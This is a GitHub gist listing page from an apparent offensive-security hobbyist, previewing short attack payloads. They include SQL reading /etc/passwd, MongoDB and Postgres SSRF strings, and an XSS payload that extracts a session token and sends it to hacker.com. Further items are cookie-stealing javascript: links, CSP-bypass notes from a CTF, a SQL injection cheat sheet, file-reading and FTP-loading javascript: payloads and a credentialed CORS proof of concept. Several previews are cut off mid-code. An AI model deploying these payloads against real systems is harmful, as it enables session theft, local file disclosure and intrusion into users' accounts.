nani1337
nani1337
/ reading etc-pass by sqleditor and ssrf
Last active
December 26, 2017 09:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| LOAD DATA LOCAL INPATH "/etc/passwd" INTO TABLE DEMO; | |
| SELECT * FROM DEMO; | |
| • Mongodb SSRF | |
| >db.copyDatabase("\nstats\nquit",'test','localhost:11211') | |
| • Postgres SSRF | |
| >SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211 | |
| sslmode=disable','select version();'); |
nani1337
/ response graber-csrf
Last active
December 26, 2017 09:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src=1 onerror=xmlHttp=new XMLHttpRequest();xmlHttp.open('GET','/mall');xmlHttp.send();xmlHttp.onreadystatechange=function(){if(xmlHttp.readyState==4){data=xmlHttp.responseText;bduss=data.substr(data.search('bduss')+8,192);window.location.href='http://hacker.com/'+bduss);}}> |
nani1337
/ generate 100 forms of ipaddress.py
Created
December 21, 2017 11:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools as it | |
| import random | |
| ip = '192.168.66.233' | |
| i = ip.split('.') | |
| def f(x): | |
| return hex(int(x))[2:].zfill(2) | |
| hi = [f(i[0]), | |
| f(i[1]), | |
| f(i[2]), |
nani1337
/ hyperlinks And redirects
Last active
September 15, 2018 21:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Create a document file, such as: Word file (docx) PPT file (pptx) Rich text file (rtf) | |
| Add a hyperlink and insert a JS script like: | |
| javascript:alert(document.domain);void(0) | |
| javascript:alert(document.cookie);void(0) | |
| javascript:alert(location.href);void(0) | |
| javascript:x=new Image();x.src=”Xss Platform”; | |
| Upload the file to the web server and open it on your Apple device using the following application, such as: |
nani1337
/ csp bypass for inline
Created
December 21, 2017 06:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This year the first leg of the XCTF Hangzhou Electric HCTF there is a problem using the 302 jump to bypass the CSP limit, did not know this point, so come down later study. | |
| For 302 jump bypass CSP, in fact, the following restrictions: | |
| "Springboard" must be within the allowed area. | |
| The host part of the file to be loaded must be consistent with the host part of the allowed domain. For example script-src http://abc.xyz/asdf, if the csp header content is yes then the file to be loaded must be located under http://abc.xyz and the path can behttp://abc.xy/xxx/xx | |
| For example, create a php, the code is as follows: |
nani1337
/ CSP-bypass for chrome
Created
December 21, 2017 05:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If the csp rules looks like this | |
| Content-Security-Policy : default-src 'self' ; script-src 'self' test . N0tr00t . Com 'unsafe-inline' ; | |
| poc bypass: | |
| <? php | |
| header ( "Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';" ); |
nani1337
/ 0x01 basic sqlinjection cheat sheet
Created
December 21, 2017 04:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0x01 basic | |
| Check the current database version | |
| VERSION () | |
| @@ VERSION | |
| @@ GLOBAL.VERSION | |
| Currently logged in user | |
| USER () | |
| CURRENT_USER () | |
| SYSTEM_USER () | |
| SESSION_USER () |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript://comment[\r\n] | |
| r=new XMLHttpRequest(); | |
| r.open('GET','file:///etc/passwd',false); | |
| r.send(null); | |
| document.getElementById('chat_text').innerHTML=r.responseText; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript://comment | |
| location.href="ftp://anonymous:[email protected]/"; | |
| window.setTimeout(function(){location.href="file:///Volumes/104.131.88.251/hack.terminal";},5000) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://site.com/api/rest/1.2/users/12056e2fcdfb3a73d9674351f107bf5a/projects?_=1496248656402',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); }; | |
| </script> | |
| </html> | |
| 2nd poc |